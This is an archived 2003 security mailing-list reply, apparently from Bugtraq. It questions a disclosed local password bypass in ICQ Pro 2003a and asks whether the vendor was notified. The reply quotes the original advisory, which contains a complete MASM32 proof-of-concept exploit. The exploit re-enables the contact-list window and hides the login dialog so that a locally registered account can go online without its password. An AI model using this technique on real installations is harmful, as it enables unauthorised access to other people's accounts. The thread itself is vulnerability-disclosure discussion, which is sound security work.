lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030708094332.E20254@road.demos.su>
Date: Tue, 8 Jul 2003 09:49:29 +0400 (MSD)
From: Seva Gluschenko <gvs@...os.net>
To: CauЦ Moura Prado <mouraprado@...oguerra.com.br>
Subject: Re: ICQ 2003a Password Bypass


Message of CauЦ Moura Prado at Jul 5 13:30 ...

CMP> Software: ICQ 2003a
CMP> Threat: Login password can be bypassed locally

I maybe missed smth but does it mean ICQ 2003a and other mentioned
cache registered user's password regardless of yser's intention or you
guys just run your "exploit" just after valid user's session, so that
status might be changed back to online just before connection timeout
exceeds? I suppose, the latter.

As a matter of fact, it still can be considered an exploit, but timing
limitations must be documented properly. It's hard to believe you can
start ICQ session w/o having UIN's password because server will just
refuse to authorize that.

And, I'm afraid to ask, you notified vendors before releasing the
thing, didn't you?

CMP> I have found a vulnerability in ICQ Pro 2003a that
CMP> allows anyone to connect to ICQ server using any
CMP> account registered locally regardless the 'save
CMP> password' option is checked or not. High level
CMP> security password is also bypassed!
CMP>
CMP> How it works?
CMP> Simple! You may use EnableWindow API to enable ICQ
CMP> contact list window. After enabling the window you can
CMP> set your status to online and the UIN will be
CMP> connected no matter how high is your security level.
CMP>
CMP> I've coded a proof-of-concept exploit in July, 02 when
CMP> I found the vuln.
CMP> The exploit is provided "As is" without warranties.
CMP> To compile it you will need MASM32.
CMP>
CMP> ; ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚
CMP> ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚
CMP> ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT
CMP> HERE - CUT HERE      BOF
CMP> ; -----------------------------------------------------
CMP> --------------------
CMP> ;
CMP> ;  07/02/2003 - ca1-icq.asm
CMP> ;  ICQ Password Bypass exploit.
CMP> ;  written by CauЦ Moura Prado (aka ca1)
CMP> ;  mouraprado@...oguerra.com.br - ICQ 373313
CMP> ;
CMP> ;  This exploit allows you to login to ICQ server
CMP> using any account registered *locally*
CMP> ;  no matter the 'save password' option is checked or
CMP> not. High level security is also bypassed.
CMP> ;  All you have to do is run the exploit and set
CMP> status property using your mouse when the flower
CMP> ;  is yellow. If you accidentally set status to
CMP> offline then you will need to restart ICQ and run
CMP> ;  the exploit again. Greets to: Alex Demchenko(aka
CMP> Coban), my cousin Rhenan for testing the exploit
CMP> ;  on his machine and that tiny Israeli company for
CMP> starting the whole thing. Oh sure.. hehehe
CMP> ;  I can't forget...  many kisses to those 3 chicks
CMP> from my building for being so hot!! ;)
CMP> ;
CMP> ;
CMP> ;        uh-oh!
CMP> ;         ___
CMP> ;      __/   \__
CMP> ;     /  \___/  \        Vulnerable:
CMP> ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
CMP> ;     /   ~~~   \
CMP> ;     \__/   \__/        Not Vulnerable:
CMP> ;        \___/             ICQ Lite alpha Build 1211
CMP> ;                          ICQ 2001b and ICQ 2002a
CMP> ;    tHe Flaw Power        All other versions were not
CMP> tested.
CMP> ;
CMP>                            coded with masm32
CMP> ;
CMP> _______________________________________________________
CMP> ________________________exploit born in .br
CMP>
CMP> .386
CMP> .model flat, stdcall
CMP> option casemap:none
CMP> include \masm32\include\user32.inc
CMP> include \masm32\include\kernel32.inc
CMP> includelib \masm32\lib\user32.lib
CMP> includelib \masm32\lib\kernel32.lib
CMP> .data
CMP> szTextHigh byte 'Password Verification', 0
CMP> szTextLow byte 'Login to server', 0
CMP> szClassName byte '#32770', 0
CMP> .data?
CMP> hWndLogin dword ?
CMP> .code
CMP> _entrypoint:
CMP>  invoke FindWindow, addr szClassName, addr szTextHigh
CMP>  mov hWndLogin, eax
CMP>  .if hWndLogin == 0
CMP>    invoke FindWindow, addr szClassName, addr szTextLow
CMP>    mov hWndLogin, eax
CMP>  .endif
CMP>  invoke GetParent, hWndLogin
CMP>  invoke EnableWindow, eax, 1      ;Enable ICQ contact
CMP> list
CMP>  invoke ShowWindow, hWndLogin, 0  ;get rid of Login
CMP> screen (don't kill this window)
CMP>  invoke ExitProcess, 0            ;uhuu.. cya! i gotta
CMP> sleep!
CMP> end _entrypoint
CMP>
CMP> ; ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚
CMP> ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚
CMP> ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT
CMP> HERE - CUT HERE      EOF
CMP> ; -----------------------------------------------------
CMP> --------------------
CMP>

SY, Seva Gluschenko, just stranger on The Road.
Demos-Internet NOC	| GVS-RIPE | GVS3-RIPN


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ